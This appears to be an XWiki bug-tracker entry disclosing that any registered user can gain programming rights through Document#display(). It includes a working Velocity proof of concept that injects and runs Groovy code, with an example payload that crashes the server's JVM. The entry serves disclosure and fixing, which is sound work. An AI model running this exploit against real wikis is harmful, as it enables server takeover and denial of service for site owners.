Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-6844

PR leak in Document#display(), exploitable by any registered user with 4 lines of velocity.

    XMLWordPrintable

Details

    • Unit
    • Unknown
    • N/A
    • N/A

    Description

      I guess everyone has already heard my pleas about making the security infrastructure simpler at the cost of not having programming permission in places where you might want it and putting a higher priority on security so I'll just get to the meat:

      #1 register a user
      #2 edit your own profile page in wiki mode
      #3 paste the following and click preview

      {{velocity}}
#set($xwp = $xwiki.getDocument('XWiki.XWikiPreferences'))
#set($obj = $xwp.getObjects('XWiki.XWikiPreferences').get(0))
$obj.set('meta', '{{groovy}}new java.util.Random().unsafe.putAddress(0,0);{{/groovy}}')
$xwp.display('meta', $obj)
{{/velocity}}

      This same problem would exist in getRenderedContent() if it were not for XWIKI-4274

      Attachments

        Issue Links

          depends on

          Task - A task that needs to be done. XWIKI-7879 Refactor to confine delegation of programming rights.

          • Critical - Crashes, loss of data, severe memory leak.
          • In Progress

          Activity

            People

              tmortagne Thomas Mortagne
              calebjamesdelisle CalebJamesDeLisle
              Votes:
              0 Vote for this issue
              Watchers:
              3 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: